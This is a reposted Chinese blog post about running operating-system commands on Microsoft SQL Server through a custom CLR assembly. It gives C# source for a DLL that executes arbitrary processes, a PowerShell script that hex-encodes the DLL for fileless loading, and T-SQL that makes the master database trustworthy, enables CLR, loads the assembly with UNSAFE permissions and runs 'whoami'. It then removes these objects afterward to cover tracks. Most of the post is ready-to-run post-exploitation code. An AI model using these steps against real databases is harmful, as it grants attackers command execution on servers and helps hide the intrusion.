「转」MSSQL CLR 执行命令

「转」MSSQL CLR 执行命令

Scroll Down

https://www.cnblogs.com/websecyw/p/11888947.html

首先创建一个dll,dll的功能命令执行

代码

using System;
using System.Data; 
using System.Diagnostics; 
using System.Data.SqlTypes; 
using Microsoft.SqlServer.Server; 
using System.Threading; 
using System.Runtime.InteropServices;
 
namespace Hi.Test { public class SQLClr {
    public static string Run( string proc, string arg )
    {
        try   { Process p = new Process();    p.StartInfo.FileName = proc;    p.StartInfo.Arguments = arg;    p.StartInfo.UseShellExecute = false;    p.StartInfo.RedirectStandardOutput = true;    p.StartInfo.RedirectStandardError = true;    p.Start();    p.WaitForExit();    return(p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd() );   }   catch ( Exception ex ) { return(ex.ToString() );   }
    }
    public static void RunProc( string proc, string arg )
    {
        SqlDataRecord record = new SqlDataRecord( new SqlMetaData( "ret", SqlDbType.NVarChar, 4000 ) );   SqlContext.Pipe.SendResultsStart( record );   record.SetString( 0, Run( proc, arg ) );   SqlContext.Pipe.SendResultsRow( record );   SqlContext.Pipe.SendResultsEnd();
    }
    public static string ProcessArch()
    {
        return(Marshal.SizeOf( typeof(IntPtr) ) == 8 ? "x64" : "x86");
    }
    [DllImport( "kernel32.dll" )] static extern IntPtr VirtualAlloc( IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect );
    } }

本地编译后生成dll文件:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /target:library c:\1.cs

image.png

因为要不落地执行,所以要把生成出来的文件转成hex,用到powershell转成hex


$assemblyFile = "C:\Users\hello\Desktop\1.dll"
$stringBuilder = New-Object -Type System.Text.StringBuilder
$stringBuilder.Append("CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM `n0x") | Out-Null
$fileStream = [IO.File]::OpenRead($assemblyFile)
while (($byte = $fileStream.ReadByte()) -gt -1) {     
    $stringBuilder.Append($byte.ToString("X2")) | Out-Null
    }
$stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") | Out-Null 
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null
$stringBuilder.AppendLine("CREATE PROCEDURE [dbo].[clr_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[clr_exec];") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null 
$stringBuilder.AppendLine(" ") | Out-Null 
$stringBuilder.AppendLine("EXEC[dbo].[clr_exec] 'whoami'") | Out-Null 
$stringBuilder.AppendLine("GO") | Out-Null 
$stringBuilder.AppendLine(" ") | Out-Null 
$stringBuilder.ToString() -join "" | Out-File d:\2221.txt

利用上面的那段 hex 创建存储过程,执行系统命令,单句执行。

use msdb;

alter database master set trustworthy on;

exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'clr enabled',1;reconfigure;

create assembly sysinfo from 0x.....(替换2221.txt文件中的HEX格式代码)   with permission_set=unsafe;

create procedure sysinfo_run_proc(@proc nvarchar(max),@arg nvarchar(max)) as external name sysinfo.[Hi.Test.SQLClr].RunProc;

create function sysinfo_run(@proc nvarchar(max),@arg nvarchar(max)) returns nvarchar(max) as external name sysinfo.[Hi.Test.SQLClr].Run;

select msdb.dbo.sysinfo_run('whoami','/user')

利用完毕之后删除创建的存储过程,恢复clr为原始状态

drop function sysinfo_run;

drop procedure sysinfo_run_proc;

drop assembly sysinfo;

exec sp_configure 'clr enabled',0;

RECONFIGURE WITH OVERRIDE;

exec sp_configure 'show advanced options',0;

RECONFIGURE WITH OVERRIDE;

https://evilanne.github.io/2020/06/26/SQLServer-CLR/